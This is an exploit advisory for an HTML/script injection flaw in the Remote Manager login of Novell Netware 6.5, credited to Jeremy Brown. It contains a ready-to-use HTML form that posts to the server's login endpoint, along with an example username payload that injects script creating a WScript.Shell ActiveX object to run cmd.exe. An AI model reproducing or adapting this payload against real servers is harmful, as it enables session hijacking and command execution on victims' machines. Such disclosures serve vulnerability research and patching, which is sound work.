The remote manager in Novell Netware version 6.5 suffers from an HTML injection vulnerability.
d55104ed15bb268ae818564d5a27a9f645fab016c404a789b83dd37ee602b8f7
<!--- Jeremy Brown (0xjbrown41@gmail.com)
Novell Netware 6.5's Remote Manager is vulnerable to script injection, session-wise,
via the client browser. A specially crafted POST command to the server will inject
data in the client's current session. Server will not resume normal operations
via the client until session is cleared or another browser is used (IE vs. FF). --->
<html>
<FORM method=POST action="https://192.168.1.201:8009/_LOGIN_SERVER2_"
name="authenticator">
<center>Novell Netware 6.5 Remote Manager HTML Injection Exploit</center>
<br><br>
Username: <input type="text" name="usr"><br>
Password: <input type="text" name="pwd"><br><br>
<input type="submit" name="login" value="LOGIN">
<br><br><center>Example --> Username: "><script>var ex=new ActiveXObject("WScript.Shell");ex.run('cmd.exe /C ver');</script></center>
</html>